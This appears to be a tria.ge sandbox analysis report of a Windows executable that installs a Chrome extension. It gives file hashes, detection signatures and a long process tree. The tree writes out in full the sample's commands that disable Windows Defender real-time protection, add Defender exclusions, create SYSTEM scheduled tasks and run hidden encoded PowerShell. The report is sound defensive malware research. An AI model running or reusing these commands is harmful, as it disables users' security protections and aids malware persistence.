Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    225s
  • max time network
    231s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    17/05/2024, 00:13

General

  • Target

    cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe

  • Size

    7.3MB

  • MD5

    6ab93856657f98664025489aff89ea78

  • SHA1

    6045d673642fd3bb832bf7289022d1b37d11de17

  • SHA256

    cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d

  • SHA512

    d3a083eebcbe8f271540ca2fa636c15599cf268e82097bc9bb8f2f5d2773461b9505426519baecf40c51390e83ad980ab565710fc821c3aecb71e475add37a1f

  • SSDEEP

    196608:91OPAOeH0m2q6X7123fIOt75sZeSi7xIYcmAiME:3OYO98PvtViZUx2O

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe
    "C:\Users\Admin\AppData\Local\Temp\cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Users\Admin\AppData\Local\Temp\7zSB2DB.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe
        .\Install.exe /LiwdidB "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2908
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3016
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3036
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:3020
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3040
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2572
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2852
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                  PID:2960
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    6⤵
                      PID:2588
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        7⤵
                          PID:2536
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      5⤵
                        PID:2772
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          6⤵
                            PID:2512
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              7⤵
                                PID:2516
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            5⤵
                              PID:2028
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                  PID:2568
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2640
                                    • C:\Windows\SysWOW64\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      8⤵
                                        PID:2556
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                4⤵
                                  PID:2376
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    5⤵
                                      PID:2364
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        6⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1044
                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          7⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1956
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 00:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\PXzTbUr.exe\" LY /ULtdidFckF 525403 /S" /V1 /F
                                    4⤵
                                    • Drops file in Windows directory
                                    • Creates scheduled task(s)
                                    PID:2344
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"
                                    4⤵
                                      PID:2336
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                        5⤵
                                          PID:1348
                                          • \??\c:\windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                            6⤵
                                              PID:1708
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {EE4DCBC7-E129-47BE-BD02-07824B4D4377} S-1-5-18:NT AUTHORITY\System:Service:
                                    1⤵
                                      PID:2140
                                      • C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\PXzTbUr.exe
                                        C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\PXzTbUr.exe LY /ULtdidFckF 525403 /S
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:816
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          3⤵
                                            PID:924
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              4⤵
                                                PID:788
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  5⤵
                                                    PID:1328
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      6⤵
                                                        PID:336
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    4⤵
                                                      PID:2684
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:2472
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            6⤵
                                                              PID:2756
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                          4⤵
                                                            PID:2728
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:2740
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  6⤵
                                                                    PID:2724
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                4⤵
                                                                  PID:2716
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:2060
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:1824
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      4⤵
                                                                        PID:3052
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          5⤵
                                                                            PID:1816
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              6⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2484
                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                7⤵
                                                                                  PID:1504
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gmZzeArCd" /SC once /ST 00:01:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:1920
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gmZzeArCd"
                                                                          3⤵
                                                                            PID:1372
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gmZzeArCd"
                                                                            3⤵
                                                                              PID:2168
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                              3⤵
                                                                                PID:1604
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                  4⤵
                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                  PID:1704
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                3⤵
                                                                                  PID:1568
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                    4⤵
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    PID:1412
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /CREATE /TN "ghHJGdKmh" /SC once /ST 00:02:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:2296
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /run /I /tn "ghHJGdKmh"
                                                                                  3⤵
                                                                                    PID:1796
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /DELETE /F /TN "ghHJGdKmh"
                                                                                    3⤵
                                                                                      PID:2604
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                      3⤵
                                                                                        PID:2616
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                          4⤵
                                                                                            PID:2932
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:940
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1512
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:1884
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                              4⤵
                                                                                              • Windows security bypass
                                                                                              PID:1888
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:1940
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                • Windows security bypass
                                                                                                PID:1020
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:1284
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                  4⤵
                                                                                                    PID:2220
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:1700
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                      4⤵
                                                                                                        PID:1728
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C copy nul "C:\Windows\Temp\mrYrpJCpOmktZWwz\WkUaCkDW\MYFilmzqZwfhHPvG.wsf"
                                                                                                      3⤵
                                                                                                        PID:1708
                                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                                        wscript "C:\Windows\Temp\mrYrpJCpOmktZWwz\WkUaCkDW\MYFilmzqZwfhHPvG.wsf"
                                                                                                        3⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:1872
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:788
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2704
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2748
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2092
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2716
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2688
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1136
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1788
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2280
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2676
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1028
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:824
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1372
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1768
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1504
                                                                                                        • C:\Windows\SysWOW64\reg.exe
